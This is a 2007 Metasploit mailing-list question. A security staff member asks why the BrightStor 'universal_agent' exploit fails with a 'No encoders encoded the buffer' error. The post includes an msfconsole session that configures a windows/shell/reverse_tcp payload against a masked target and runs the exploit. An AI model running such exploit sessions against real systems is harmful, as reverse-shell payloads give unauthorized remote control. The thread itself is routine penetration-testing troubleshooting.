Metasploit mailing list archives

Question about a Brigthstore exploit

From: francis.provencher at msp.gouv.qc.ca (FRANCIS PROVENCHER)
Date: Thu, 13 Sep 2007 15:25:42 -0400

Hi all,

I'm trying to test the Brigthstore "Universal" exploit againt a target
that are vulnerable to this exploit;

here the error i received;

msf exploit(universal_agent) > set RHOST ******
RHOST => *******
msf exploit(universal_agent) > set PAYLOAD windows/shell/reverse_tcp
PAYLOAD => windows/shell/reverse_tcp
msf exploit(universal_agent) > set LHOST *******
LHOST => ********
msf exploit(universal_agent) > show options

Module options:

   Name   Current Setting  Required  Description
   ----   ---------------  --------  -----------
   RHOST  *******     yes       The target address
   RPORT  6050             yes       The target port

Payload options:

   Name      Current Setting  Required  Description
   ----      ---------------  --------  -----------
   EXITFUNC  seh              yes       Exit technique: seh, thread,
process
   LHOST     **********    yes       The local address
   LPORT     4444             yes       The local port

Exploit target:

   Id  Name
   --  ----
   0   Magic Heap Target #1

msf exploit(universal_agent) > exploit
[-] Exploit failed: No encoders encoded the buffer successfully.

What can cause this error? I never see it before.

Thanks all

Francis Provencher
Minist?re de la S?curit? publique du Qu?bec
Direction des technologies de l'information
Division de la s?curit? informatique
T?l: 1 418 646-3258
Courriel:   Francis.provencher at Msp.gouv.qc.ca

CEH - Certified Ethical Hackers
SSCP - System Security Certified Practitionner
Sec+ - Security +